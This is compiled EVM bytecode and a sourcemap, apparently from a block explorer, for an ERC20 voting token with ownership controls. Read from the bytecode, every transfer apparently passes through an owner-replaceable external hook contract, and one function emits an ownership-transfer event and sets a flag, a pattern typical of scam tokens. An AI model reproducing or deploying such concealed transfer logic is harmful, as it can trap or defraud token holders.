35b6103b1610f63565b6040516103be919061224c565b60405180910390f35b6103e160048036038101906103dc919061244b565b610ff3565b6040516103ee919061237d565b60405180910390f35b610411600480360381019061040c91906122fd565b6110c8565b60405161041e9190612355565b60405180910390f35b610441600480360381019061043c91906122fd565b611190565b60405161044e9190612355565b60405180910390f35b610471600480360381019061046c919061244b565b6111ad565b005b61048d60048036038101906104889190612539565b611224565b60405161049a919061237d565b60405180910390f35b6104ab6112a6565b6040516104b891906123ae565b60405180910390f35b6104db60048036038101906104d691906125a1565b6112ca565b6040516104e99291906125df565b60405180910390f35b61050c6004803603810190610507919061244b565b611304565b005b60606005805461051d90612633565b80601f016020809104026020016040519081016040528092919081815260200182805461054990612633565b80156105945780601f1061056b57610100808354040283529160200191610594565b820191905f5260205f20905b81548152906001019060200180831161057757829003601f168201915b5050505050905090565b5f6105b16105aa6114a9565b84846114b0565b6001905092915050565b5f600454905090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b5f6105f4848484611673565b6106b1846106006114a9565b6106ac85604051806060016040528060288152602001612f5c6028913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6106636114a9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117469092919063ffffffff16565b6114b0565b600190509392505050565b5f60075f9054906101000a900460ff16905090565b5f6107756106dd6114a9565b846107708560025f6106ed6114a9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117a390919063ffffffff16565b6114b0565b6001905092915050565b60035f9054906101000a900460ff1681565b600a602052805f5260405f205f915054906101000a900463ffffffff1681565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107ff6114a9565b73ffffffffffffffffffffffffffffffffffffffff1661081d610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614610873576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086a906126ad565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f805f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f438210610970576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109679061273b565b60405180910390fd5b5f600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f8163ffffffff16036109d6575f915050610cd5565b8260095f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600184610a229190612786565b63ffffffff1663ffffffff1681526020019081526020015f205f015f9054906101000a900463ffffffff1663ffffffff1611610ac85760095f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600183610aa39190612786565b63ffffffff1663ffffffff1681526020019081526020015f2060010154915050610cd5565b8260095f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8063ffffffff1681526020019081526020015f205f015f9054906101000a900463ffffffff1663ffffffff161115610b42575f915050610cd5565b5f80600183610b519190612786565b90505b8163ffffffff168163ffffffff161115610c73575f60028383610b779190612786565b610b8191906127ea565b82610b8c9190612786565b90505f60095f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8363ffffffff1663ffffffff1681526020019081526020015f206040518060400160405290815f82015f9054906101000a900463ffffffff1663ffffffff1663ffffffff168152602001600182015481525050905086815f015163ffffffff1603610c4357806020015195505050505050610cd5565b86815f015163ffffffff161015610c5c57819350610c6c565b600182610c699190612786565b92505b5050610b54565b60095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8363ffffffff1663ffffffff1681526020019081526020015f206001015493505050505b92915050565b610ce36114a9565b73ffffffffffffffffffffffffffffffffffffffff16610d01610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614610d57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4e906126ad565b60405180910390fd5b6001151560035f9054906101000a900460ff16151503610e7b575f821115610d8757610d8281611800565b610dee565b604051610d93906121b5565b604051809103905ff080158015610dac573d5f803e3d5ffd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28585856040518463ffffffff1660e01b8152600401610e4d9392919061281a565b5f604051808303815f87803b158015610e64575f80fd5b505af1158015610e76573d5f803e3d5ffd5b505050505b50505050565b610e896114a9565b73ffffffffffffffffffffffffffffffffffffffff16610ea7610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614610efd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef4906126ad565b60405180910390fd5b60035f9054906101000a900460ff161560035f6101000a81548160ff021916908315150217905550565b600b602052805f5260405f205f915090505481565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610f7290612633565b80601f0160208091040260200160405190810160405280929190818152602001828054610f9e90612633565b8015610fe95780601f10610fc057610100808354040283529160200191610fe9565b820191905f5260205f20905b815481529060010190602001808311610fcc57829003601f168201915b5050505050905090565b5f80600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f8163ffffffff1611611057575f6110c0565b60095f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6001836110a29190612786565b63ffffffff1663ffffffff1681526020019081526020015f20600101545b915050919050565b5f6111866110d46114a9565b8461118185604051806060016040528060258152602001612fb26025913960025f6110fd6114a9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117469092919063ffffffff16565b6114b0565b6001905092915050565b5f6111a361119c6114a9565b8484611673565b6001905092915050565b8073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360015f60146101000a81548160ff02191690831515021790555050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b6009602052815f5260405f20602052805f5260405f205f9150915050805f015f9054906101000a900463ffffffff16908060010154905082565b61130c6114a9565b73ffffffffffffffffffffffffffffffffffffffff1661132a610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614611380576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611377906126ad565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113e5906128bf565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361151e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115159061294d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361158c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611583906129db565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611666919061237d565b60405180910390a3505050565b61167e838383611852565b61174160085f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660085f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611adf565b505050565b5f83831115829061178d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611784919061224c565b60405180910390fd5b50828461179a91906129f9565b90509392505050565b5f8082846117b19190612a2c565b9050838110156117f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117ed90612aa9565b60405180910390fd5b8091505092915050565b611808611d75565b1561184f5780600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b790612b37565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361192e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192590612bc5565b60405180910390fd5b611939838383611d8a565b6119a381604051806060016040528060268152602001612f366026913960015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117469092919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611a348160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117a390919063ffffffff16565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ad2919061237d565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611b1a57505f81115b15611d70575f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611c47575f600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f808263ffffffff1611611bb6575f611c1f565b60095f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600184611c019190612786565b63ffffffff1663ffffffff1681526020019081526020015f20600101545b90505f611c358483611e1b90919063ffffffff16565b9050611c4386848484611e73565b5050505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611d6f575f600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f808263ffffffff1611611cde575f611d47565b60095f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600184611d299190612786565b63ffffffff1663ffffffff1681526020019081526020015f20600101545b90505f611d5d84836117a390919063ffffffff16565b9050611d6b85848484611e73565b5050505b5b505050565b5f8060149054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28484846040518463ffffffff1660e01b8152600401611de99392919061281a565b5f604051808303815f87803b158015611e00575f80fd5b505af1158015611e12573d5f803e3d5ffd5b50505050505050565b5f82821115611e5f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e5690612c2d565b60405180910390fd5b8183611e6b91906129f9565b905092915050565b5f611e96436040518060600160405280602e8152602001612f84602e9139612160565b90505f8463ffffffff16118015611f2d57508063ffffffff1660095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600187611efa9190612786565b63ffffffff1663ffffffff1681526020019081526020015f205f015f9054906101000a900463ffffffff1663ffffffff16145b15611fa3578160095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600187611f7e9190612786565b63ffffffff1663ffffffff1681526020019081526020015f2060010181905550612109565b60405180604001604052808263ffffffff1681526020018381525060095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8663ffffffff1663ffffffff1681526020019081526020015f205f820151815f015f6101000a81548163ffffffff021916908363ffffffff160217905550602082015181600101559050508363ffffffff1660018561205b9190612c4b565b63ffffffff16116120a1576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161209890612cf2565b60405180910390fd5b6001846120ae9190612c4b565b600a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548163ffffffff021916908363ffffffff1602179055505b8473ffffffffffffffffffffffffffffffffffffffff167fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a7248484604051612151929190612d10565b60405180910390a25050505050565b5f640100000000831082906121ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121a2919061224c565b60405180910390fd5b5082905092915050565b6101fe80612d3883390190565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156121f95780820151818401526020810190506121de565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61221e826121c2565b61222881856121cc565b93506122388185602086016121dc565b61224181612204565b840191505092915050565b5f6020820190508181035f8301526122648184612214565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61229982612270565b9050919050565b6122a98161228f565b81146122b3575f80fd5b50565b5f813590506122c4816122a0565b92915050565b5f819050919050565b6122dc816122ca565b81146122e6575f80fd5b50565b5f813590506122f7816122d3565b92915050565b5f80604083850312156123135761231261226c565b5b5f612320858286016122b6565b9250506020612331858286016122e9565b9150509250929050565b5f8115159050919050565b61234f8161233b565b82525050565b5f6020820190506123685f830184612346565b92915050565b612377816122ca565b82525050565b5f6020820190506123905f83018461236e565b92915050565b5f819050919050565b6123a881612396565b82525050565b5f6020820190506123c15f83018461239f565b92915050565b5f805f606084860312156123de576123dd61226c565b5b5f6123eb868287016122b6565b93505060206123fc868287016122b6565b925050604061240d868287016122e9565b9150509250925092565b5f60ff82169050919050565b61242c81612417565b82525050565b5f6020820190506124455f830184612423565b92915050565b5f602082840312156124605761245f61226c565b5b5f61246d848285016122b6565b91505092915050565b5f63ffffffff82169050919050565b61248e81612476565b82525050565b5f6020820190506124a75f830184612485565b92915050565b5f805f80608085870312156124c5576124c461226c565b5b5f6124d2878288016122b6565b94505060206124e3878288016122b6565b93505060406124f4878288016122e9565b9250506060612505878288016122b6565b91505092959194509250565b61251a8161228f565b82525050565b5f6020820190506125335f830184612511565b92915050565b5f806040838503121561254f5761254e61226c565b5b5f61255c858286016122b6565b925050602061256d858286016122b6565b9150509250929050565b61258081612476565b811461258a575f80fd5b50565b5f8135905061259b81612577565b92915050565b5f80604083850312156125b7576125b661226c565b5b5f6125c4858286016122b6565b92505060206125d58582860161258d565b9150509250929050565b5f6040820190506125f25f830185612485565b6125ff602083018461236e565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061264a57607f821691505b60208210810361265d5761265c612606565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6126976020836121cc565b91506126a282612663565b602082019050919050565b5f6020820190508181035f8301526126c48161268b565b9050919050565b7f6765745072696f72566f7465733a206e6f74207965742064657465726d696e655f8201527f6400000000000000000000000000000000000000000000000000000000000000602082015250565b5f6127256021836121cc565b9150612730826126cb565b604082019050919050565b5f6020820190508181035f83015261275281612719565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61279082612476565b915061279b83612476565b9250828203905063ffffffff8111156127b7576127b6612759565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6127f482612476565b91506127ff83612476565b92508261280f5761280e6127bd565b5b828204905092915050565b5f60608201905061282d5f830186612511565b61283a6020830185612511565b612847604083018461236e565b949350505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6128a96026836121cc565b91506128b48261284f565b604082019050919050565b5f6020820190508181035f8301526128d68161289d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6129376024836121cc565b9150612942826128dd565b604082019050919050565b5f6020820190508181035f8301526129648161292b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6129c56022836121cc565b91506129d08261296b565b604082019050919050565b5f6020820190508181035f8301526129f2816129b9565b9050919050565b5f612a03826122ca565b9150612a0e836122ca565b9250828203905081811115612a2657612a25612759565b5b92915050565b5f612a36826122ca565b9150612a41836122ca565b9250828201905080821115612a5957612a58612759565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f612a93601b836121cc565b9150612a9e82612a5f565b602082019050919050565b5f6020820190508181035f830152612ac081612a87565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612b216025836121cc565b9150612b2c82612ac7565b604082019050919050565b5f6020820190508181035f830152612b4e81612b15565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612baf6023836121cc565b9150612bba82612b55565b604082019050919050565b5f6020820190508181035f830152612bdc81612ba3565b9050919050565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f7700005f82015250565b5f612c17601e836121cc565b9150612c2282612be3565b602082019050919050565b5f6020820190508181035f830152612c4481612c0b565b9050919050565b5f612c5582612476565b9150612c6083612476565b9250828201905063ffffffff811115612c7c57612c7b612759565b5b92915050565b7f5f7772697465436865636b706f696e743a206e657720636865636b706f696e745f8201527f2065786365656473203332206269747300000000000000000000000000000000602082015250565b5f612cdc6030836121cc565b9150612ce782612c82565b604082019050919050565b5f6020820190508181035f830152612d0981612cd0565b9050919050565b5f604082019050612d235f83018561236e565b612d30602083018461236e565b939250505056fe608060405234801561000f575f80fd5b506101e18061001d5f395ff3fe608060405234801561000f575f80fd5b5060043610610029575f3560e01c80636bf92ea21461002d575b5f80fd5b6100476004803603810190610042919061015b565b610049565b005b805f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6100f7826100ce565b9050919050565b610107816100ed565b8114610111575f80fd5b50565b5f81359050610122816100fe565b92915050565b5f819050919050565b61013a81610128565b8114610144575f80fd5b50565b5f8135905061015581610131565b92915050565b5f805f60608486031215610172576101716100ca565b5b5f61017f86828701610114565b935050602061019086828701610114565b92505060406101a186828701610147565b915050925092509256fea2646970667358221220c5cad3415f2ddc756382156050b47f17a0ec2452edd2dfd8a21996db1884746a64736f6c6343000814003345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122038f6d22fb458e62ded9255127e4ca4b1c4107b43b89519ce1a04c50eef563ca664736f6c63430008140033

Deployed Bytecode Sourcemap

140:7067:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5206:91:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7140:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5362:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1631:122:4;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7791:321:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6108:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8521:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4224:26;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1509:49:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6264:127:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1946:148:2;;;:::i;:::-;;3346:1247:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12372:307:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6776:92:4;;;:::i;:::-;;2045:39;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1295:87:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5041:95:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2667:248:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9242:269:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6604:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1052:164:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6842:151:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1847:117:4;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1370:70;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;;:::i;:::-;;;;;;;;2249:244:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5206:91:1;5251:13;5284:5;5277:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5206:91;:::o;7140:169::-;7223:4;7240:39;7249:12;:10;:12::i;:::-;7263:7;7272:6;7240:8;:39::i;:::-;7297:4;7290:11;;7140:169;;;;:::o;5362:108::-;5423:7;5450:12;;5443:19;;5362:108;:::o;1631:122:4:-;1673:80;1631:122;:::o;7791:321:1:-;7897:4;7914:36;7924:6;7932:9;7943:6;7914:9;:36::i;:::-;7961:121;7970:6;7978:12;:10;:12::i;:::-;7992:89;8030:6;7992:89;;;;;;;;;;;;;;;;;:11;:19;8004:6;7992:19;;;;;;;;;;;;;;;:33;8012:12;:10;:12::i;:::-;7992:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;7961:8;:121::i;:::-;8100:4;8093:11;;7791:321;;;;;:::o;6108:91::-;6157:5;6182:9;;;;;;;;;;;6175:16;;6108:91;:::o;8521:218::-;8609:4;8626:83;8635:12;:10;:12::i;:::-;8649:7;8658:50;8697:10;8658:11;:25;8670:12;:10;:12::i;:::-;8658:25;;;;;;;;;;;;;;;:34;8684:7;8658:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;8626:8;:83::i;:::-;8727:4;8720:11;;8521:218;;;;:::o;4224:26::-;;;;;;;;;;;;;:::o;1509:49:4:-;;;;;;;;;;;;;;;;;;;;;;:::o;6264:127:1:-;6338:7;6365:9;:18;6375:7;6365:18;;;;;;;;;;;;;;;;6358:25;;6264:127;;;:::o;1946:148:2:-;1526:12;:10;:12::i;:::-;1515:23;;:7;:5;:7::i;:::-;:23;;;1507:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2053:1:::1;2016:40;;2037:6;::::0;::::1;;;;;;;;2016:40;;;;;;;;;;;;2084:1;2067:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;1946:148::o:0;3346:1247:4:-;3454:7;3501:12;3487:11;:26;3479:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;3564:19;3586:14;:23;3601:7;3586:23;;;;;;;;;;;;;;;;;;;;;;;;;3564:45;;3640:1;3624:12;:17;;;3620:58;;3665:1;3658:8;;;;;3620:58;3790:11;3738;:20;3750:7;3738:20;;;;;;;;;;;;;;;:38;3774:1;3759:12;:16;;;;:::i;:::-;3738:38;;;;;;;;;;;;;;;:48;;;;;;;;;;;;:63;;;3734:147;;3825:11;:20;3837:7;3825:20;;;;;;;;;;;;;;;:38;3861:1;3846:12;:16;;;;:::i;:::-;3825:38;;;;;;;;;;;;;;;:44;;;3818:51;;;;;3734:147;3978:11;3942;:20;3954:7;3942:20;;;;;;;;;;;;;;;:23;3963:1;3942:23;;;;;;;;;;;;;:33;;;;;;;;;;;;:47;;;3938:88;;;4013:1;4006:8;;;;;3938:88;4038:12;4065;4095:1;4080:12;:16;;;;:::i;:::-;4065:31;;4107:428;4122:5;4114:13;;:5;:13;;;4107:428;;;4144:13;4186:1;4177:5;4169;:13;;;;:::i;:::-;4168:19;;;;:::i;:::-;4160:5;:27;;;;:::i;:::-;4144:43;;4229:20;4252:11;:20;4264:7;4252:20;;;;;;;;;;;;;;;:28;4273:6;4252:28;;;;;;;;;;;;;;;4229:51;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4315:11;4299:2;:12;;;:27;;;4295:229;;4354:2;:8;;;4347:15;;;;;;;;;4295:229;4403:11;4388:2;:12;;;:26;;;4384:140;;;4443:6;4435:14;;4384:140;;;4507:1;4498:6;:10;;;;:::i;:::-;4490:18;;4384:140;4129:406;;4107:428;;;4552:11;:20;4564:7;4552:20;;;;;;;;;;;;;;;:27;4573:5;4552:27;;;;;;;;;;;;;;;:33;;;4545:40;;;;;3346:1247;;;;;:::o;12372:307:1:-;1526:12:2;:10;:12::i;:::-;1515:23;;:7;:5;:7::i;:::-;:23;;;1507:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12503:4:1::1;12487:20;;:14;;;;;;;;;;;:20;;::::0;12484:188:::1;;12531:1;12522:6;:10;12519:94;;;12534:18;12547:4;12534:12;:18::i;:::-;12519:94;;;12584:19;;;;;:::i;:::-;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;12576:7;;:27;;;;;;;;;;;;;;;;;;12519:94;12623:7;;;;;;;;;;;:12;;;12636:6;12644:9;12655:6;12623:39;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;12484:188;12372:307:::0;;;;:::o;6776:92:4:-;1526:12:2;:10;:12::i;:::-;1515:23;;:7;:5;:7::i;:::-;:23;;;1507:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6846:14:4::1;;;;;;;;;;;6845:15;6828:14;;:32;;;;;;;;;;;;;;;;;;6776:92::o:0;2045:39::-;;;;;;;;;;;;;;;;;:::o;1295:87:2:-;1341:7;1368:6;;;;;;;;;;;1361:13;;1295:87;:::o;5041:95:1:-;5088:13;5121:7;5114:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5041:95;:::o;2667:248:4:-;2752:7;2777:19;2799:14;:23;2814:7;2799:23;;;;;;;;;;;;;;;;;;;;;;;;;2777:45;;2855:1;2840:12;:16;;;:67;;2906:1;2840:67;;;2859:11;:20;2871:7;2859:20;;;;;;;;;;;;;;;:38;2895:1;2880:12;:16;;;;:::i;:::-;2859:38;;;;;;;;;;;;;;;:44;;;2840:67;2833:74;;;2667:248;;;:::o;9242:269:1:-;9335:4;9352:129;9361:12;:10;:12::i;:::-;9375:7;9384:96;9423:15;9384:96;;;;;;;;;;;;;;;;;:11;:25;9396:12;:10;:12::i;:::-;9384:25;;;;;;;;